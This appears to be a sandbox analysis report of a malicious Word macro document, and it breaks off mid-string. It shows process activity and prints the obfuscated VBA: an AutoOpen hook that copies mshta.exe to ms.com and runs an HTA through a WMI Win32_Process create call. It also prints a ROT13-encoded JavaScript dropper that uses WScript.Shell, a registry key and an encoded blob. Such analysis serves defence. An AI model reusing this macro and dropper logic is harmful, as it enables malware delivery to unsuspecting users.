                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:10:12:10
                                                                                                                                                                                            Start date:03/12/2020
                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                                                            Imagebase:0x1270000
                                                                                                                                                                                            File size:1937688 bytes
                                                                                                                                                                                            MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:10:12:13
                                                                                                                                                                                            Start date:03/12/2020
                                                                                                                                                                                            Path:C:\Users\Public\ms.com
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\users\public\ms.com C:\users\public\ms.html
                                                                                                                                                                                            Imagebase:0xb30000
                                                                                                                                                                                            File size:13312 bytes
                                                                                                                                                                                            MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, Metadefender, Browse
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:10:12:15
                                                                                                                                                                                            Start date:03/12/2020
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp
                                                                                                                                                                                            Imagebase:0x2b0000
                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                            Call Graph

                                                                                                                                                                                            Graph

                                                                                                                                                                                            • Entrypoint
                                                                                                                                                                                            • Decryption Function
                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            • Show Help
                                                                                                                                                                                            callgraph 11 aSGxU Len:1,Mid:1 40 akSqK Replace:1 52 awAlq create:1 52->11 52->40 112 axSiN 52->112 365 aYKyQ 52->365 377 axIuO 52->377 80 AutoOpen 80->52 86 aCqnt 86->40 94 aMslO 94->40 103 ayUxA2 103->40 112->94 112->103 438 adkJvD 112->438 x 2 138 aVzRp 138->86 138->94 409 amZcqK FileCopy:1 138->409 138->438 x 2 164 a3ox6 174 a3eJx 203 aYzBn 211 a9vceZ Chr:1 221 a6sXJE Asc:1,Mid:1 221->164 x 2 221->174 221->203 221->211 419 adBRr 221->419 353 aG87E 354 a7zcHr 356 a8qpd 365->138 473 ah28l 377->473 391 aX4od FreeFile:1 426 aGSfMv 426->11 438->426 473->103 473->221 473->356 473->391 473->438

                                                                                                                                                                                            Module: ThisDocument

                                                                                                                                                                                            Declaration
                                                                                                                                                                                            LineContent
                                                                                                                                                                                            1

                                                                                                                                                                                            Attribute VB_Name = "ThisDocument"

                                                                                                                                                                                            2

                                                                                                                                                                                            Attribute VB_Base = "1Normal.ThisDocument"

                                                                                                                                                                                            3

                                                                                                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                            4

                                                                                                                                                                                            Attribute VB_Creatable = False

                                                                                                                                                                                            5

                                                                                                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                                                                                                            6

                                                                                                                                                                                            Attribute VB_Exposed = True

                                                                                                                                                                                            7

                                                                                                                                                                                            Attribute VB_TemplateDerived = True

                                                                                                                                                                                            8

                                                                                                                                                                                            Attribute VB_Customizable = True

                                                                                                                                                                                            Module: a7A5m

                                                                                                                                                                                            Declaration
                                                                                                                                                                                            LineContent
                                                                                                                                                                                            1

                                                                                                                                                                                            Attribute VB_Name = "a7A5m"

                                                                                                                                                                                            Executed Functions
                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Part of subcall function akSqK@a7A5m: Replace

                                                                                                                                                                                            Part of subcall function akSqK@a7A5m: a7odJ

                                                                                                                                                                                            Part of subcall function aSGxU@a7A5m: Len

                                                                                                                                                                                            Part of subcall function aSGxU@a7A5m: Mid

                                                                                                                                                                                            a3IdJQ

                                                                                                                                                                                            create

                                                                                                                                                                                            SWbemObjectEx.create("C:\users\public\ms.com C:\users\public\ms.html") -> 0
                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            42

                                                                                                                                                                                            Sub awAlq()

                                                                                                                                                                                            47

                                                                                                                                                                                            aYKyQ

                                                                                                                                                                                            executed
                                                                                                                                                                                            52

                                                                                                                                                                                            axIuO

                                                                                                                                                                                            65

                                                                                                                                                                                            agPh8 = akSqK(aSGxU(a3IdJQ))

                                                                                                                                                                                            a3IdJQ

                                                                                                                                                                                            66

                                                                                                                                                                                            CreateObject(agPh8).create (axSiN)

                                                                                                                                                                                            SWbemObjectEx.create("C:\users\public\ms.com C:\users\public\ms.html") -> 0

                                                                                                                                                                                            executed
                                                                                                                                                                                            67

                                                                                                                                                                                            End Sub

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Replace

                                                                                                                                                                                            Replace(")c):)\)w)i)n)d)o)w)s)\)s)y)s)t)e)m)3)2)\)m)s)h)t)a).)e)x)e)",")","") -> c:\windows\system32\mshta.exe Replace(")C):)\)u)s)e)r)s)\)p)u)b)l)i)c)\)m)s).)c)o)m)",")","") -> C:\users\public\ms.com Replace(")C):)\)u)s)e)r)s)\)p)u)b)l)i)c)\)m)s).)h)t)m)l",")","") -> C:\users\public\ms.html Replace("win)mgm)ts:)roo)t\c)imv)2:W)in3)2_P)roc)ess",")","") -> winmgmts:root\cimv2:Win32_Process

                                                                                                                                                                                            a7odJ

                                                                                                                                                                                            StringsDecrypted Strings
                                                                                                                                                                                            """"
                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            39

                                                                                                                                                                                            Public Function akSqK(aPENSZ)

                                                                                                                                                                                            40

                                                                                                                                                                                            akSqK = Replace(aPENSZ, a7odJ, "")

                                                                                                                                                                                            Replace(")c):)\)w)i)n)d)o)w)s)\)s)y)s)t)e)m)3)2)\)m)s)h)t)a).)e)x)e)",")","") -> c:\windows\system32\mshta.exe

                                                                                                                                                                                            a7odJ

                                                                                                                                                                                            executed
                                                                                                                                                                                            41

                                                                                                                                                                                            End Function

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Len

                                                                                                                                                                                            Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)") -> 174 Len("sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw") -> 43

                                                                                                                                                                                            Mid

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            2

                                                                                                                                                                                            Function aSGxU(aie8CL)

                                                                                                                                                                                            33

                                                                                                                                                                                            For a6mGn = Len(aie8CL) To 1 Step - 1

                                                                                                                                                                                            Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)") -> 174

                                                                                                                                                                                            executed
                                                                                                                                                                                            34

                                                                                                                                                                                            azUoN = Mid(aie8CL, a6mGn, 1)

                                                                                                                                                                                            Mid

                                                                                                                                                                                            35

                                                                                                                                                                                            adHaPl = adHaPl & azUoN

                                                                                                                                                                                            36

                                                                                                                                                                                            Next

                                                                                                                                                                                            Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)") -> 174

                                                                                                                                                                                            executed
                                                                                                                                                                                            37

                                                                                                                                                                                            aSGxU = adHaPl

                                                                                                                                                                                            38

                                                                                                                                                                                            End Function

                                                                                                                                                                                            Module: aH8xms

                                                                                                                                                                                            Declaration
                                                                                                                                                                                            LineContent
                                                                                                                                                                                            1

                                                                                                                                                                                            Attribute VB_Name = "aH8xms"

                                                                                                                                                                                            Executed Functions
                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Part of subcall function awAlq@a7A5m: a3IdJQ

                                                                                                                                                                                            Part of subcall function awAlq@a7A5m: create

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            2

                                                                                                                                                                                            Sub AutoOpen()

                                                                                                                                                                                            3

                                                                                                                                                                                            awAlq

                                                                                                                                                                                            executed
                                                                                                                                                                                            4

                                                                                                                                                                                            End Sub

                                                                                                                                                                                            Module: aIsb7

                                                                                                                                                                                            Declaration
                                                                                                                                                                                            LineContent
                                                                                                                                                                                            1

                                                                                                                                                                                            Attribute VB_Name = "aIsb7"

                                                                                                                                                                                            Executed Functions
                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Part of subcall function akSqK@a7A5m: Replace

                                                                                                                                                                                            Part of subcall function akSqK@a7A5m: a7odJ

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            2

                                                                                                                                                                                            Function aCqnt(ayM1o)

                                                                                                                                                                                            6

                                                                                                                                                                                            aCqnt = akSqK(ayM1o)

                                                                                                                                                                                            executed
                                                                                                                                                                                            7

                                                                                                                                                                                            End Function

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Part of subcall function akSqK@a7A5m: Replace

                                                                                                                                                                                            Part of subcall function akSqK@a7A5m: a7odJ

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            8

                                                                                                                                                                                            Function aMslO(aucpr)

                                                                                                                                                                                            13

                                                                                                                                                                                            aMslO = (akSqK(aucpr))

                                                                                                                                                                                            executed
                                                                                                                                                                                            14

                                                                                                                                                                                            End Function

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Part of subcall function akSqK@a7A5m: Replace

                                                                                                                                                                                            Part of subcall function akSqK@a7A5m: a7odJ

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            15

                                                                                                                                                                                            Function ayUxA2(aT2PX)

                                                                                                                                                                                            20

                                                                                                                                                                                            ayUxA2 = (akSqK(aT2PX))

                                                                                                                                                                                            executed
                                                                                                                                                                                            21

                                                                                                                                                                                            End Function

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Part of subcall function amZcqK@abh0Rg: FileCopy

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            27

                                                                                                                                                                                            Sub aVzRp()

                                                                                                                                                                                            28

                                                                                                                                                                                            acIr6u = aCqnt(adkJvD(0))

                                                                                                                                                                                            executed
                                                                                                                                                                                            29

                                                                                                                                                                                            adeKx = aMslO(adkJvD(1))

                                                                                                                                                                                            30

                                                                                                                                                                                            amZcqK acIr6u, adeKx

                                                                                                                                                                                            31

                                                                                                                                                                                            End Sub

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Chr

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            62

                                                                                                                                                                                            Function a9vceZ(a48o6)

                                                                                                                                                                                            63

                                                                                                                                                                                            a9vceZ = Chr(a48o6)

                                                                                                                                                                                            Chr

                                                                                                                                                                                            executed
                                                                                                                                                                                            64

                                                                                                                                                                                            End Function

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            35

                                                                                                                                                                                            Function a3eJx(aFP9Ao)

                                                                                                                                                                                            36

                                                                                                                                                                                            If aFP9Ao = 0 Then

                                                                                                                                                                                            executed
                                                                                                                                                                                            37

                                                                                                                                                                                            a3eJx = - 6824 + 6825

                                                                                                                                                                                            53

                                                                                                                                                                                            Elseif aFP9Ao = 5 Then

                                                                                                                                                                                            54

                                                                                                                                                                                            a3eJx = - 63 + 160

                                                                                                                                                                                            55

                                                                                                                                                                                            Else

                                                                                                                                                                                            56

                                                                                                                                                                                            a3eJx = 1049 - 25

                                                                                                                                                                                            57

                                                                                                                                                                                            Endif

                                                                                                                                                                                            58

                                                                                                                                                                                            End Function

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            22

                                                                                                                                                                                            Function axSiN()

                                                                                                                                                                                            23

                                                                                                                                                                                            adeKx = aMslO(adkJvD(1))

                                                                                                                                                                                            executed
                                                                                                                                                                                            24

                                                                                                                                                                                            aaqRT = ayUxA2(adkJvD(2))

                                                                                                                                                                                            25

                                                                                                                                                                                            axSiN = adeKx & " " & aaqRT

                                                                                                                                                                                            26

                                                                                                                                                                                            End Function

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            32

                                                                                                                                                                                            Function a3ox6(a48o6)

                                                                                                                                                                                            33

                                                                                                                                                                                            a3ox6 = a48o6 + - 158 + 184

                                                                                                                                                                                            executed
                                                                                                                                                                                            34

                                                                                                                                                                                            End Function

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            59

                                                                                                                                                                                            Function aYzBn(a48o6, a20NB)

                                                                                                                                                                                            60

                                                                                                                                                                                            aYzBn = a48o6 - a20NB

                                                                                                                                                                                            executed
                                                                                                                                                                                            61

                                                                                                                                                                                            End Function

                                                                                                                                                                                            Module: aOMv0

                                                                                                                                                                                            Declaration
                                                                                                                                                                                            LineContent
                                                                                                                                                                                            1

                                                                                                                                                                                            Attribute VB_Name = "aOMv0"

                                                                                                                                                                                            Executed Functions
                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Len

                                                                                                                                                                                            Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) | (rap2 >> 4); pue2 = ((rap2 & 15) << 4) | (rap3 >> 2); pue3 = ((rap3 & 3) << 6) | rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = "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) -> 17902

                                                                                                                                                                                            Mid

                                                                                                                                                                                            Asc

                                                                                                                                                                                            as8nLc

                                                                                                                                                                                            Part of subcall function a9vceZ@aIsb7: Chr

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            2

                                                                                                                                                                                            Function a6sXJE(a2cCM) as String

                                                                                                                                                                                            3

                                                                                                                                                                                            Dim as6h1W as Long

                                                                                                                                                                                            executed
                                                                                                                                                                                            4

                                                                                                                                                                                            Dim aDKIk as Integer

                                                                                                                                                                                            5

                                                                                                                                                                                            Dim aJjwu as Integer

                                                                                                                                                                                            6

                                                                                                                                                                                            For as6h1W = 1 To VBA.Len(a2cCM) Step 1

                                                                                                                                                                                            Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) | (rap2 >> 4); pue2 = ((rap2 & 15) << 4) | (rap3 >> 2); pue3 = ((rap3 & 3) << 6) | rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = "qaSzA2uupJL3nUWkMwqbVUSzA2uupJL3nQIkMwqbDKSzA2uipJL3nTMkMwqbVUSzA2t9pJL3nPOkMwqbYKSzA2t0pJL3nQAkMwqbA3SzA2tmpJL3nQIkMwqbB3SzA2uzpJL3nUIkMwqboaSzA2uwpJL3nUEkMwqbnKSzA2uipJL3nT5kMwqbVUSzA2uxpJL3nTIkMwqbL3SzA2uipJL3nTEkMwqbMKSzA2tbpJL3nTykMwqboaSzA2ujpJL3nUIkMwqbqUSzA2tcpJL3nUgkMwqbqaSzA2uupJL3nUWkMwqbVUSzA2uepJL3nTIkMwqbrKSzA2umpJL3nUEkMwqbpaSzA2ttpJL3nQ1kMwqbVUSzA2tvpJL3nRSkMwqbDaSzA2uQpJL3nREkMwqbEKSzA2uTpJL3nRqkMwqbFUSzA2uWpJL3nRckMwqbF3SzA2uZpJL3nR1kMwqbGaSzA2uCpJL3nSOkMwqbHKSzA2uFpJL3nSAkMwqbIUSzA2uIpJL3nSMkMwqbI3SzA2uLpJL3nSykMwqbJaSzA2uupJL3nTWkMwqbL3SzA2uxpJL3nTIkMwqbMaSzA2uapJL3nTukMwqbnKSzA2udpJL3nTgkMwqboUSzA2ugpJL3nT5kMwqbo3SzA2ujpJL3nUSkMwqbpaSzA2umpJL3nUEkMwqbqKSzA2u2pJL3nUqkMwqbrUSzA2u5pJL3nUckMwqbZUSzA2tkpJL3nQWkMwqbZ3SzA2t0pJL3nQIkMwqbAaSzA2t3pJL3nQukMwqbBKSzA2tepJL3nP9kMwqbCKSzA2tvpJL3nQgkMwqbqaSzA2uupJL3nUWkMwqbVUSzA2uipJL3nUIkMwqbqUSzA2ujpJL3nUIkMwqbqUSzA2ttpJL3nQ1kMwqbVUSzA2tvpJL3nPWkMwqbB3SzA2u2pJL3nTSkMwqbpaSzA2ttpJL3nTAkMwqbnUSzA2ulpJL3nQSkMwqbYUSzA2ttpJL3nTAkMwqbnUSzA2ulpJL3nQWkMwqbYUSzA2ttpJL3nTAkMwqbnUSzA2ulpJL3nQAkMwqbB3SzA2u2pJL3nTSkMwqbpaSzA2ttpJL3nTIkMwqboaSzA2uwpJL3nQSkMwqbYUSzA2ttpJL3nTIkMwqboaSzA2uwpJL3nQWkMwqbYUSzA2ttpJL3nTIkMwqboaSzA2uwpJL3nQAkMwqbYUSzA2ttpJL3nTIkMwqboaSzA2uwpJL3nQEkMwqbB3SzA2u2pJL3nTSkMwqbpaSzA2ttpJL3nTykMwqbVUSzA2t9pJL3nPOkMwqbZUSzA2t7pJL3nTykMwqboaSzA2ujpJL3nUIkMwqbqUSzA2ttpJL3nQ1kMwqbVUSzA2ucpJL3nT5kMwqbpUSzA2u1pJL3nUEkMwqbYaSzA2ulpJL3nTIkMwqbpUSzA2ufpJL3nTSkMwqbL3SzA2uypJL3nPukMwqbY3SzA2uopJL3nS5kMwqbDKSzA2tgpJL3nSckMwqbLKSzA2tgpJL3nUckMwqbZUSzA2tgpJL3nQykMwqbKUSzA2tepJL3nSkkMwqbY3SzA2uppJL3nQ1kMwqbKKSzA2tipJL3nTqkMwqbYUSzA2ttpJL3nPWkMwqbVaSzA2tcpJL3nQgkMwqbq3SzA2ubpJL3nTykMwqboUSzA2uypJL3nPOkMwqbXUSzA2ucpJL3nPOkMwqbCUSzA2ttpJL3nTykMwqboaSzA2ujpJL3nUIkMwqbqUSzA2thpJL3nTkkMwqbMKSzA2uhpJL3nTqkMwqbqUSzA2ubpJL3nPykMwqbr3SzA2uypJL3nT5kMwqbL3SzA2tkpJL3nPOkMwqbCKSzA2ttpJL3nTgkMwqbMKSzA2u5pJL3nUAkMwqbqUSzA2ulpJL3nP5kMwqbnKSzA2uhpJL3nTEkMwqbMKSzA2u4pJL3nR9kMwqbMaSzA2tbpJL3nTykMwqboaSzA2ujpJL3nUIkMwqbqUSzA2thpJL3nTAkMwqbnUSzA2uupJL3nUWkMwqbDKSzA2u0pJL3nPukMwqbnKSzA2tepJL3nPgkMwqbXKSzA2tcpJL3nQgkMwqbMKSzA2uhpJL3nTAkMwqbZaSzA2ttpJL3nQ1kMwqbVUSzA2uepJL3nTIkMwqbrKSzA2umpJL3nUEkMwqbpaSzA2thpJL3nTykMwqboaSzA2uxpJL3nTIkMwqbrUSzA2uCpJL3nTMkMwqbXUSzA2ucpJL3nT5kMwqbpUSzA2u1pJL3nUEkMwqbYaSzA2uwpJL3nTukMwqbLKSzA2ulpJL3nRSkMwqbqUSzA2tbpJL3nTykMwqbX3SzA2tepJL3nPykMwqbXKSzA2t7pJL3nTIkMwqboaSzA2uwpJL3nQAkMwqbVUSzA2t9pJL3nPOkMwqbn3SzA2uypJL3nUykMwqbp3SzA2u0pJL3nUWkMwqbYaSzA2ucpJL3nT5kMwqbMUSzA2uypJL3nUukMwqbG3SzA2uzpJL3nPukMwqbnKSzA2uhpJL3nUOkMwqbqKSzA2u0pJL3nP5kMwqbL3SzA2ubpJL3nTSkMwqbpaSzA2uOpJL3nUEkMwqbXUSzA2ucpJL3nP